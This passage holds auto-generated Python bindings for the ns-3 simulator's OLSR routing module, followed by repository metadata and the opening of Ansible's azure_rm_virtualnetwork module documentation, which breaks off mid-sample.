ns3::olsr::OlsrState::EraseMprSelectorTuple(ns3::olsr::MprSelectorTuple const & tuple) [member function] cls.add_method('EraseMprSelectorTuple', 'void', [param('ns3::olsr::MprSelectorTuple const &', 'tuple')]) ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::EraseMprSelectorTuples(ns3::Ipv4Address const & mainAddr) [member function] cls.add_method('EraseMprSelectorTuples', 'void', [param('ns3::Ipv4Address const &', 'mainAddr')]) ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::EraseNeighborTuple(ns3::olsr::NeighborTuple const & neighborTuple) [member function] cls.add_method('EraseNeighborTuple', 'void', [param('ns3::olsr::NeighborTuple const &', 'neighborTuple')]) ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::EraseNeighborTuple(ns3::Ipv4Address const & mainAddr) [member function] cls.add_method('EraseNeighborTuple', 'void', [param('ns3::Ipv4Address const &', 'mainAddr')]) ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::EraseOlderTopologyTuples(ns3::Ipv4Address const & lastAddr, uint16_t ansn) [member function] cls.add_method('EraseOlderTopologyTuples', 'void', [param('ns3::Ipv4Address const &', 'lastAddr'), param('uint16_t', 'ansn')]) ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::EraseTopologyTuple(ns3::olsr::TopologyTuple const & tuple) [member function] cls.add_method('EraseTopologyTuple', 'void', [param('ns3::olsr::TopologyTuple const &', 'tuple')]) ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::EraseTwoHopNeighborTuple(ns3::olsr::TwoHopNeighborTuple const & tuple) [member function] cls.add_method('EraseTwoHopNeighborTuple', 'void', [param('ns3::olsr::TwoHopNeighborTuple const &', 'tuple')]) ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::EraseTwoHopNeighborTuples(ns3::Ipv4Address const & neighbor) [member function] cls.add_method('EraseTwoHopNeighborTuples', 'void', [param('ns3::Ipv4Address const &', 'neighbor')]) ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::EraseTwoHopNeighborTuples(ns3::Ipv4Address const & neighbor, ns3::Ipv4Address const & twoHopNeighbor) [member function] cls.add_method('EraseTwoHopNeighborTuples', 'void', [param('ns3::Ipv4Address const &', 'neighbor'), param('ns3::Ipv4Address const &', 'twoHopNeighbor')]) ## olsr-state.h (module 'olsr'): ns3::olsr::AssociationTuple * ns3::olsr::OlsrState::FindAssociationTuple(ns3::Ipv4Address const & gatewayAddr, ns3::Ipv4Address const & networkAddr, ns3::Ipv4Mask const & netmask) [member function] cls.add_method('FindAssociationTuple', 'ns3::olsr::AssociationTuple *', [param('ns3::Ipv4Address const &', 'gatewayAddr'), param('ns3::Ipv4Address const &', 'networkAddr'), param('ns3::Ipv4Mask const &', 'netmask')]) ## olsr-state.h (module 'olsr'): ns3::olsr::DuplicateTuple * ns3::olsr::OlsrState::FindDuplicateTuple(ns3::Ipv4Address const & address, uint16_t sequenceNumber) [member function] cls.add_method('FindDuplicateTuple', 'ns3::olsr::DuplicateTuple *', [param('ns3::Ipv4Address const &', 'address'), param('uint16_t', 'sequenceNumber')]) ## olsr-state.h (module 'olsr'): ns3::olsr::IfaceAssocTuple * ns3::olsr::OlsrState::FindIfaceAssocTuple(ns3::Ipv4Address const & ifaceAddr) [member function] cls.add_method('FindIfaceAssocTuple', 'ns3::olsr::IfaceAssocTuple *', [param('ns3::Ipv4Address const &', 'ifaceAddr')]) ## olsr-state.h (module 'olsr'): ns3::olsr::IfaceAssocTuple const * ns3::olsr::OlsrState::FindIfaceAssocTuple(ns3::Ipv4Address const & ifaceAddr) const [member function] cls.add_method('FindIfaceAssocTuple', 'ns3::olsr::IfaceAssocTuple const *', [param('ns3::Ipv4Address const &', 'ifaceAddr')], is_const=True) ## olsr-state.h (module 'olsr'): ns3::olsr::LinkTuple * ns3::olsr::OlsrState::FindLinkTuple(ns3::Ipv4Address const & ifaceAddr) [member function] cls.add_method('FindLinkTuple', 'ns3::olsr::LinkTuple *', [param('ns3::Ipv4Address const &', 'ifaceAddr')]) ## olsr-state.h (module 'olsr'): bool ns3::olsr::OlsrState::FindMprAddress(ns3::Ipv4Address const & address) [member function] cls.add_method('FindMprAddress', 'bool', [param('ns3::Ipv4Address const &', 'address')]) ## olsr-state.h (module 'olsr'): ns3::olsr::MprSelectorTuple * ns3::olsr::OlsrState::FindMprSelectorTuple(ns3::Ipv4Address const & mainAddr) [member function] cls.add_method('FindMprSelectorTuple', 'ns3::olsr::MprSelectorTuple *', [param('ns3::Ipv4Address const &', 'mainAddr')]) ## olsr-state.h (module 'olsr'): std::vector<ns3::Ipv4Address, std::allocator<ns3::Ipv4Address> > ns3::olsr::OlsrState::FindNeighborInterfaces(ns3::Ipv4Address const & neighborMainAddr) const [member function] cls.add_method('FindNeighborInterfaces', 'std::vector< ns3::Ipv4Address >', [param('ns3::Ipv4Address const &', 'neighborMainAddr')], is_const=True) ## olsr-state.h (module 'olsr'): ns3::olsr::NeighborTuple * ns3::olsr::OlsrState::FindNeighborTuple(ns3::Ipv4Address const & mainAddr) [member function] cls.add_method('FindNeighborTuple', 'ns3::olsr::NeighborTuple *', [param('ns3::Ipv4Address const &', 'mainAddr')]) ## olsr-state.h (module 'olsr'): ns3::olsr::NeighborTuple * ns3::olsr::OlsrState::FindNeighborTuple(ns3::Ipv4Address const & mainAddr, uint8_t willingness) [member function] cls.add_method('FindNeighborTuple', 'ns3::olsr::NeighborTuple *', [param('ns3::Ipv4Address const &', 'mainAddr'), param('uint8_t', 'willingness')]) ## olsr-state.h (module 'olsr'): ns3::olsr::TopologyTuple * ns3::olsr::OlsrState::FindNewerTopologyTuple(ns3::Ipv4Address const & lastAddr, uint16_t ansn) [member function] cls.add_method('FindNewerTopologyTuple', 'ns3::olsr::TopologyTuple *', [param('ns3::Ipv4Address const &', 'lastAddr'), param('uint16_t', 'ansn')]) ## olsr-state.h (module 'olsr'): ns3::olsr::LinkTuple * ns3::olsr::OlsrState::FindSymLinkTuple(ns3::Ipv4Address const & ifaceAddr, ns3::Time time) [member function] cls.add_method('FindSymLinkTuple', 'ns3::olsr::LinkTuple *', [param('ns3::Ipv4Address const &', 'ifaceAddr'), param('ns3::Time', 'time')]) ## olsr-state.h (module 'olsr'): ns3::olsr::NeighborTuple const * ns3::olsr::OlsrState::FindSymNeighborTuple(ns3::Ipv4Address const & mainAddr) const [member function] cls.add_method('FindSymNeighborTuple', 'ns3::olsr::NeighborTuple const *', [param('ns3::Ipv4Address const &', 'mainAddr')], is_const=True) ## olsr-state.h (module 'olsr'): ns3::olsr::TopologyTuple * ns3::olsr::OlsrState::FindTopologyTuple(ns3::Ipv4Address const & destAddr, ns3::Ipv4Address const & lastAddr) [member function] cls.add_method('FindTopologyTuple', 'ns3::olsr::TopologyTuple *', [param('ns3::Ipv4Address const &', 'destAddr'), param('ns3::Ipv4Address const &', 'lastAddr')]) ## olsr-state.h (module 'olsr'): ns3::olsr::TwoHopNeighborTuple * ns3::olsr::OlsrState::FindTwoHopNeighborTuple(ns3::Ipv4Address const & neighbor, ns3::Ipv4Address const & twoHopNeighbor) [member function] cls.add_method('FindTwoHopNeighborTuple', 'ns3::olsr::TwoHopNeighborTuple *', [param('ns3::Ipv4Address const &', 'neighbor'), param('ns3::Ipv4Address const &', 'twoHopNeighbor')]) ## olsr-state.h (module 'olsr'): ns3::olsr::AssociationSet const & ns3::olsr::OlsrState::GetAssociationSet() const [member function] cls.add_method('GetAssociationSet', 'ns3::olsr::AssociationSet const &', [], is_const=True) ## olsr-state.h (module 'olsr'): ns3::olsr::Associations const & ns3::olsr::OlsrState::GetAssociations() const [member function] cls.add_method('GetAssociations', 'ns3::olsr::Associations const &', [], is_const=True) ## olsr-state.h (module 'olsr'): ns3::olsr::IfaceAssocSet const & ns3::olsr::OlsrState::GetIfaceAssocSet() const [member function] cls.add_method('GetIfaceAssocSet', 'ns3::olsr::IfaceAssocSet const &', [], is_const=True) ## olsr-state.h (module 'olsr'): ns3::olsr::IfaceAssocSet & ns3::olsr::OlsrState::GetIfaceAssocSetMutable() [member function] cls.add_method('GetIfaceAssocSetMutable', 'ns3::olsr::IfaceAssocSet &', []) ## olsr-state.h (module 'olsr'): ns3::olsr::LinkSet const & ns3::olsr::OlsrState::GetLinks() const [member function] cls.add_method('GetLinks', 'ns3::olsr::LinkSet const &', [], is_const=True) ## olsr-state.h (module 'olsr'): ns3::olsr::MprSelectorSet const & ns3::olsr::OlsrState::GetMprSelectors() const [member function] cls.add_method('GetMprSelectors', 'ns3::olsr::MprSelectorSet const &', [], is_const=True) ## olsr-state.h (module 'olsr'): ns3::olsr::MprSet ns3::olsr::OlsrState::GetMprSet() const [member function] cls.add_method('GetMprSet', 'ns3::olsr::MprSet', [], is_const=True) ## olsr-state.h (module 'olsr'): ns3::olsr::NeighborSet const & ns3::olsr::OlsrState::GetNeighbors() const [member function] cls.add_method('GetNeighbors', 'ns3::olsr::NeighborSet const &', [], is_const=True) ## olsr-state.h (module 'olsr'): ns3::olsr::NeighborSet & ns3::olsr::OlsrState::GetNeighbors() [member function] cls.add_method('GetNeighbors', 'ns3::olsr::NeighborSet &', []) ## olsr-state.h (module 'olsr'): ns3::olsr::TopologySet const & ns3::olsr::OlsrState::GetTopologySet() const [member function] cls.add_method('GetTopologySet', 'ns3::olsr::TopologySet const &', [], is_const=True) ## olsr-state.h (module 'olsr'): ns3::olsr::TwoHopNeighborSet const & ns3::olsr::OlsrState::GetTwoHopNeighbors() const [member function] cls.add_method('GetTwoHopNeighbors', 'ns3::olsr::TwoHopNeighborSet const &', [], is_const=True) ## olsr-state.h (module 'olsr'): ns3::olsr::TwoHopNeighborSet & ns3::olsr::OlsrState::GetTwoHopNeighbors() [member function] cls.add_method('GetTwoHopNeighbors', 'ns3::olsr::TwoHopNeighborSet &', []) ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::InsertAssociation(ns3::olsr::Association const & tuple) [member function] cls.add_method('InsertAssociation', 'void', [param('ns3::olsr::Association const &', 'tuple')]) ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::InsertAssociationTuple(ns3::olsr::AssociationTuple const & tuple) [member function] cls.add_method('InsertAssociationTuple', 'void', [param('ns3::olsr::AssociationTuple const &', 'tuple')]) ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::InsertDuplicateTuple(ns3::olsr::DuplicateTuple const & tuple) [member function] cls.add_method('InsertDuplicateTuple', 'void', [param('ns3::olsr::DuplicateTuple const &', 'tuple')]) ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::InsertIfaceAssocTuple(ns3::olsr::IfaceAssocTuple const & tuple) [member function] cls.add_method('InsertIfaceAssocTuple', 'void', [param('ns3::olsr::IfaceAssocTuple const &', 'tuple')]) ## olsr-state.h (module 'olsr'): ns3::olsr::LinkTuple & ns3::olsr::OlsrState::InsertLinkTuple(ns3::olsr::LinkTuple const & tuple) [member function] cls.add_method('InsertLinkTuple', 'ns3::olsr::LinkTuple &', [param('ns3::olsr::LinkTuple const &', 'tuple')]) ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::InsertMprSelectorTuple(ns3::olsr::MprSelectorTuple const & tuple) [member function] cls.add_method('InsertMprSelectorTuple', 'void', [param('ns3::olsr::MprSelectorTuple const &', 'tuple')]) ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::InsertNeighborTuple(ns3::olsr::NeighborTuple const & tuple) [member function] cls.add_method('InsertNeighborTuple', 'void', [param('ns3::olsr::NeighborTuple const &', 'tuple')]) ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::InsertTopologyTuple(ns3::olsr::TopologyTuple const & tuple) [member function] cls.add_method('InsertTopologyTuple', 'void', [param('ns3::olsr::TopologyTuple const &', 'tuple')]) ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::InsertTwoHopNeighborTuple(ns3::olsr::TwoHopNeighborTuple const & tuple) [member function] cls.add_method('InsertTwoHopNeighborTuple', 'void', [param('ns3::olsr::TwoHopNeighborTuple const &', 'tuple')]) ## olsr-state.h (module 'olsr'): std::string ns3::olsr::OlsrState::PrintMprSelectorSet() const [member function] cls.add_method('PrintMprSelectorSet', 'std::string', [], is_const=True) ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::SetMprSet(ns3::olsr::MprSet mprSet) [member function] cls.add_method('SetMprSet', 'void', [param('ns3::olsr::MprSet', 'mprSet')]) return def register_Ns3OlsrPacketHeader_methods(root_module, cls): cls.add_output_stream_operator() ## olsr-header.h (module 'olsr'): ns3::olsr::PacketHeader::PacketHeader(ns3::olsr::PacketHeader const & arg0) [copy constructor] cls.add_constructor([param('ns3::olsr::PacketHeader const &', 'arg0')]) ## olsr-header.h (module 'olsr'): ns3::olsr::PacketHeader::PacketHeader() [constructor] cls.add_constructor([]) ## olsr-header.h (module 'olsr'): uint32_t ns3::olsr::PacketHeader::Deserialize(ns3::Buffer::Iterator start) [member function] cls.add_method('Deserialize', 'uint32_t', [param('ns3::Buffer::Iterator', 'start')], is_virtual=True) ## olsr-header.h (module 'olsr'): ns3::TypeId ns3::olsr::PacketHeader::GetInstanceTypeId() const [member function] cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_const=True, is_virtual=True) ## olsr-header.h (module 'olsr'): uint16_t ns3::olsr::PacketHeader::GetPacketLength() const [member function] cls.add_method('GetPacketLength', 'uint16_t', [], is_const=True) ## olsr-header.h (module 'olsr'): uint16_t ns3::olsr::PacketHeader::GetPacketSequenceNumber() const [member function] cls.add_method('GetPacketSequenceNumber', 'uint16_t', [], is_const=True) ## olsr-header.h (module 'olsr'): uint32_t ns3::olsr::PacketHeader::GetSerializedSize() const [member function] cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True, is_virtual=True) ## olsr-header.h (module 'olsr'): static ns3::TypeId ns3::olsr::PacketHeader::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## olsr-header.h (module 'olsr'): void ns3::olsr::PacketHeader::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True, is_virtual=True) ## olsr-header.h (module 'olsr'): void ns3::olsr::PacketHeader::Serialize(ns3::Buffer::Iterator start) const [member function] cls.add_method('Serialize', 'void', [param('ns3::Buffer::Iterator', 'start')], is_const=True, is_virtual=True) ## olsr-header.h (module 'olsr'): void ns3::olsr::PacketHeader::SetPacketLength(uint16_t length) [member function] cls.add_method('SetPacketLength', 'void', [param('uint16_t', 'length')]) ## olsr-header.h (module 'olsr'): void ns3::olsr::PacketHeader::SetPacketSequenceNumber(uint16_t seqnum) [member function] cls.add_method('SetPacketSequenceNumber', 'void', [param('uint16_t', 'seqnum')]) return def register_Ns3OlsrRoutingProtocol_methods(root_module, cls): ## olsr-routing-protocol.h (module 'olsr'): ns3::olsr::RoutingProtocol::RoutingProtocol(ns3::olsr::RoutingProtocol const & arg0) [copy constructor] cls.add_constructor([param('ns3::olsr::RoutingProtocol const &', 'arg0')]) ## olsr-routing-protocol.h (module 'olsr'): ns3::olsr::RoutingProtocol::RoutingProtocol() [constructor] cls.add_constructor([]) ## olsr-routing-protocol.h (module 'olsr'): void ns3::olsr::RoutingProtocol::AddHostNetworkAssociation(ns3::Ipv4Address networkAddr, ns3::Ipv4Mask netmask) [member function] cls.add_method('AddHostNetworkAssociation', 'void', [param('ns3::Ipv4Address', 'networkAddr'), param('ns3::Ipv4Mask', 'netmask')]) ## olsr-routing-protocol.h (module 'olsr'): int64_t ns3::olsr::RoutingProtocol::AssignStreams(int64_t stream) [member function] cls.add_method('AssignStreams', 'int64_t', [param('int64_t', 'stream')]) ## olsr-routing-protocol.h (module 'olsr'): void ns3::olsr::RoutingProtocol::Dump() [member function] cls.add_method('Dump', 'void', []) ## olsr-routing-protocol.h (module 'olsr'): std::set<unsigned int, std::less<unsigned int>, std::allocator<unsigned int> > ns3::olsr::RoutingProtocol::GetInterfaceExclusions() const [member function] cls.add_method('GetInterfaceExclusions', 'std::set< unsigned int >', [], is_const=True) ## olsr-routing-protocol.h (module 'olsr'): ns3::Ptr<const ns3::Ipv4StaticRouting> ns3::olsr::RoutingProtocol::GetRoutingTableAssociation() const [member function] cls.add_method('GetRoutingTableAssociation', 'ns3::Ptr< ns3::Ipv4StaticRouting const >', [], is_const=True) ## olsr-routing-protocol.h (module 'olsr'): std::vector<ns3::olsr::RoutingTableEntry,std::allocator<ns3::olsr::RoutingTableEntry> > ns3::olsr::RoutingProtocol::GetRoutingTableEntries() const [member function] cls.add_method('GetRoutingTableEntries', 'std::vector< ns3::olsr::RoutingTableEntry >', [], is_const=True) ## olsr-routing-protocol.h (module 'olsr'): static ns3::TypeId ns3::olsr::RoutingProtocol::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## olsr-routing-protocol.h (module 'olsr'): void ns3::olsr::RoutingProtocol::RemoveHostNetworkAssociation(ns3::Ipv4Address networkAddr, ns3::Ipv4Mask netmask) [member function] cls.add_method('RemoveHostNetworkAssociation', 'void', [param('ns3::Ipv4Address', 'networkAddr'), param('ns3::Ipv4Mask', 'netmask')]) ## olsr-routing-protocol.h (module 'olsr'): void ns3::olsr::RoutingProtocol::SetInterfaceExclusions(std::set<unsigned int, std::less<unsigned int>, std::allocator<unsigned int> > exceptions) [member function] cls.add_method('SetInterfaceExclusions', 'void', [param('std::set< unsigned int >', 'exceptions')]) ## olsr-routing-protocol.h (module 'olsr'): void ns3::olsr::RoutingProtocol::SetMainInterface(uint32_t interface) [member function] cls.add_method('SetMainInterface', 'void', [param('uint32_t', 'interface')]) ## olsr-routing-protocol.h (module 'olsr'): void ns3::olsr::RoutingProtocol::SetRoutingTableAssociation(ns3::Ptr<ns3::Ipv4StaticRouting> routingTable) [member function] cls.add_method('SetRoutingTableAssociation', 'void', [param('ns3::Ptr< ns3::Ipv4StaticRouting >', 'routingTable')]) ## olsr-routing-protocol.h (module 'olsr'): void ns3::olsr::RoutingProtocol::DoInitialize() [member function] cls.add_method('DoInitialize', 'void', [], visibility='protected', is_virtual=True) ## olsr-routing-protocol.h (module 'olsr'): void ns3::olsr::RoutingProtocol::DoDispose() [member function] cls.add_method('DoDispose', 'void', [], visibility='private', is_virtual=True) ## olsr-routing-protocol.h (module 'olsr'): void ns3::olsr::RoutingProtocol::NotifyAddAddress(uint32_t interface, ns3::Ipv4InterfaceAddress address) [member function] cls.add_method('NotifyAddAddress', 'void', [param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')], visibility='private', is_virtual=True) ## olsr-routing-protocol.h (module 'olsr'): void ns3::olsr::RoutingProtocol::NotifyInterfaceDown(uint32_t interface) [member function] cls.add_method('NotifyInterfaceDown', 'void', [param('uint32_t', 'interface')], visibility='private', is_virtual=True) ## olsr-routing-protocol.h (module 'olsr'): void ns3::olsr::RoutingProtocol::NotifyInterfaceUp(uint32_t interface) [member function] cls.add_method('NotifyInterfaceUp', 'void', [param('uint32_t', 'interface')], visibility='private', is_virtual=True) ## olsr-routing-protocol.h (module 'olsr'): void ns3::olsr::RoutingProtocol::NotifyRemoveAddress(uint32_t interface, ns3::Ipv4InterfaceAddress address) [member function] cls.add_method('NotifyRemoveAddress', 'void', [param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')], visibility='private', is_virtual=True) ## olsr-routing-protocol.h (module 'olsr'): void ns3::olsr::RoutingProtocol::PrintRoutingTable(ns3::Ptr<ns3::OutputStreamWrapper> stream, ns3::Time::Unit unit=::ns3::Time::S) const [member function] cls.add_method('PrintRoutingTable', 'void', [param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream'), param('ns3::Time::Unit', 'unit', default_value='::ns3::Time::S')], is_const=True, visibility='private', is_virtual=True) ## olsr-routing-protocol.h (module 'olsr'): bool ns3::olsr::RoutingProtocol::RouteInput(ns3::Ptr<const ns3::Packet> p, ns3::Ipv4Header const & header, ns3::Ptr<const ns3::NetDevice> idev, ns3::Callback<void,ns3::Ptr<ns3::Ipv4Route>,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ucb, ns3::Callback<void,ns3::Ptr<ns3::Ipv4MulticastRoute>,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> mcb, ns3::Callback<void,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,unsigned int,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> lcb, ns3::Callback<void,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,ns3::Socket::SocketErrno,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ecb) [member function] cls.add_method('RouteInput', 'bool', [param('ns3::Ptr< ns3::Packet const >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::NetDevice const >', 'idev'), param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4Route >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ucb'), param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4MulticastRoute >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'mcb'), param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'lcb'), param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ecb')], visibility='private', is_virtual=True) ## olsr-routing-protocol.h (module 'olsr'): ns3::Ptr<ns3::Ipv4Route> ns3::olsr::RoutingProtocol::RouteOutput(ns3::Ptr<ns3::Packet> p, ns3::Ipv4Header const & header, ns3::Ptr<ns3::NetDevice> oif, ns3::Socket::SocketErrno & sockerr) [member function] cls.add_method('RouteOutput', 'ns3::Ptr< ns3::Ipv4Route >', [param('ns3::Ptr< ns3::Packet >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::NetDevice >', 'oif'), param('ns3::Socket::SocketErrno &', 'sockerr')], visibility='private', is_virtual=True) ## olsr-routing-protocol.h (module 'olsr'): void ns3::olsr::RoutingProtocol::SetIpv4(ns3::Ptr<ns3::Ipv4> ipv4) [member function] cls.add_method('SetIpv4', 'void', [param('ns3::Ptr< ns3::Ipv4 >', 'ipv4')], visibility='private', is_virtual=True) return def register_Ns3OlsrRoutingTableEntry_methods(root_module, cls): ## olsr-routing-protocol.h (module 'olsr'): ns3::olsr::RoutingTableEntry::RoutingTableEntry(ns3::olsr::RoutingTableEntry const & arg0) [copy constructor] cls.add_constructor([param('ns3::olsr::RoutingTableEntry const &', 'arg0')]) ## olsr-routing-protocol.h (module 'olsr'): ns3::olsr::RoutingTableEntry::RoutingTableEntry() [constructor] cls.add_constructor([]) ## olsr-routing-protocol.h (module 'olsr'): ns3::olsr::RoutingTableEntry::destAddr [variable] cls.add_instance_attribute('destAddr', 'ns3::Ipv4Address', is_const=False) ## olsr-routing-protocol.h (module 'olsr'): ns3::olsr::RoutingTableEntry::distance [variable] cls.add_instance_attribute('distance', 'uint32_t', is_const=False) ## olsr-routing-protocol.h (module 'olsr'): ns3::olsr::RoutingTableEntry::interface [variable] cls.add_instance_attribute('interface', 'uint32_t', is_const=False) ## olsr-routing-protocol.h (module 'olsr'): ns3::olsr::RoutingTableEntry::nextAddr [variable] cls.add_instance_attribute('nextAddr', 'ns3::Ipv4Address', is_const=False) return def register_Ns3OlsrTopologyTuple_methods(root_module, cls): cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## olsr-repositories.h (module 'olsr'): ns3::olsr::TopologyTuple::TopologyTuple() [constructor] cls.add_constructor([]) ## olsr-repositories.h (module 'olsr'): ns3::olsr::TopologyTuple::TopologyTuple(ns3::olsr::TopologyTuple const & arg0) [copy constructor] cls.add_constructor([param('ns3::olsr::TopologyTuple const &', 'arg0')]) ## olsr-repositories.h (module 'olsr'): ns3::olsr::TopologyTuple::destAddr [variable] cls.add_instance_attribute('destAddr', 'ns3::Ipv4Address', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::TopologyTuple::expirationTime [variable] cls.add_instance_attribute('expirationTime', 'ns3::Time', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::TopologyTuple::lastAddr [variable] cls.add_instance_attribute('lastAddr', 'ns3::Ipv4Address', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::TopologyTuple::sequenceNumber [variable] cls.add_instance_attribute('sequenceNumber', 'uint16_t', is_const=False) return def register_Ns3OlsrTwoHopNeighborTuple_methods(root_module, cls): cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## olsr-repositories.h (module 'olsr'): ns3::olsr::TwoHopNeighborTuple::TwoHopNeighborTuple() [constructor] cls.add_constructor([]) ## olsr-repositories.h (module 'olsr'): ns3::olsr::TwoHopNeighborTuple::TwoHopNeighborTuple(ns3::olsr::TwoHopNeighborTuple const & arg0) [copy constructor] cls.add_constructor([param('ns3::olsr::TwoHopNeighborTuple const &', 'arg0')]) ## olsr-repositories.h (module 'olsr'): ns3::olsr::TwoHopNeighborTuple::expirationTime [variable] cls.add_instance_attribute('expirationTime', 'ns3::Time', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::TwoHopNeighborTuple::neighborMainAddr [variable] cls.add_instance_attribute('neighborMainAddr', 'ns3::Ipv4Address', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::TwoHopNeighborTuple::twoHopNeighborAddr [variable] cls.add_instance_attribute('twoHopNeighborAddr', 'ns3::Ipv4Address', is_const=False) return def register_functions(root_module): module = root_module register_functions_ns3_FatalImpl(module.get_submodule('FatalImpl'), root_module) register_functions_ns3_Hash(module.get_submodule('Hash'), root_module) register_functions_ns3_TracedValueCallback(module.get_submodule('TracedValueCallback'), root_module) register_functions_ns3_olsr(module.get_submodule('olsr'), root_module) return def register_functions_ns3_FatalImpl(module, root_module): return def register_functions_ns3_Hash(module, root_module): register_functions_ns3_Hash_Function(module.get_submodule('Function'), root_module) return def register_functions_ns3_Hash_Function(module, root_module): return def register_functions_ns3_TracedValueCallback(module, root_module): return def register_functions_ns3_olsr(module, root_module): ## olsr-header.h (module 'olsr'): extern double ns3::olsr::EmfToSeconds(uint8_t emf) [free function] module.add_function('EmfToSeconds', 'double', [param('uint8_t', 'emf')]) ## olsr-header.h (module 'olsr'): extern uint8_t ns3::olsr::SecondsToEmf(double seconds) [free function] module.add_function('SecondsToEmf', 'uint8_t', [param('double', 'seconds')]) return def main(): out = FileCodeSink(sys.stdout) root_module = module_init() register_types(root_module) register_methods(root_module) register_functions(root_module) root_module.generate(out) if __name__ == '__main__': main()
gpl-2.0
benthomasson/ansible
lib/ansible/modules/cloud/azure/azure_rm_virtualnetwork.py
10
13313
#!/usr/bin/python # # Copyright (c) 2016 Matt Davis, <mdavis@ansible.com> # Chris Houseknecht, <house@redhat.com> # # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.0', 'status': ['preview'], 'supported_by': 'curated'} DOCUMENTATION = ''' --- module: azure_rm_virtualnetwork version_added: "2.1" short_description: Manage Azure virtual networks. description: - Create, update or delete a virtual networks. Allows setting and updating the available IPv4 address ranges and setting custom DNS servers. Use the azure_rm_subnet module to associate subnets with a virtual network. options: resource_group: description: - name of resource group. required: true address_prefixes_cidr: description: - List of IPv4 address ranges where each is formatted using CIDR notation. Required when creating a new virtual network or using purge_address_prefixes. aliases: - address_prefixes default: null required: false dns_servers: description: - Custom list of DNS servers. Maximum length of two. The first server in the list will be treated as the Primary server. This is an explicit list. Existing DNS servers will be replaced with the specified list. Use the purge_dns_servers option to remove all custom DNS servers and revert to default Azure servers. default: null required: false location: description: - Valid azure location. Defaults to location of the resource group. default: resource_group location required: false name: description: - name of the virtual network. required: true purge_address_prefixes: description: - Use with state present to remove any existing address_prefixes. default: false purge_dns_servers: description: - Use with state present to remove existing DNS servers, reverting to default Azure servers. Mutually exclusive with dns_servers. default: false required: false state: description: - Assert the state of the virtual network. Use 'present' to create or update and 'absent' to delete. default: present choices: - absent - present required: false extends_documentation_fragment: - azure - azure_tags author: - "Chris Houseknecht (@chouseknecht)" - "Matt Davis (@nitzmahone)" ''' EXAMPLES = ''' - name: Create a virtual network azure_rm_virtualnetwork: name: foobar resource_group: Testing address_prefixes_cidr: - "10.1.0.0/16" - "172.100.0.0/16" dns_servers: - "127.0.0.1" - "127.0.0.2" tags: testing: testing delete: on-exit - name: Delete a virtual network azure_rm_virtualnetwork: name: foobar resource_group: Testing state: absent ''' RETURN = ''' state: description: Current state of the virtual network. returned: always type: dict sample: { "address_prefixes": [ "10.1.0.0/16", "172.100.0.0/16" ], "dns_servers": [ "127.0.0.1", "127.0.0.3" ], "etag": 'W/"0712e87c-f02f-4bb3-8b9e-2da0390a3886"', "id": "/subscriptions/XXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXX/resourceGroups/Testing/providers/Microsoft.Network/virtualNetworks/my_test_network", "location": "eastus", "name": "my_test_network", "provisioning_state": "Succeeded", "tags": null, "type": 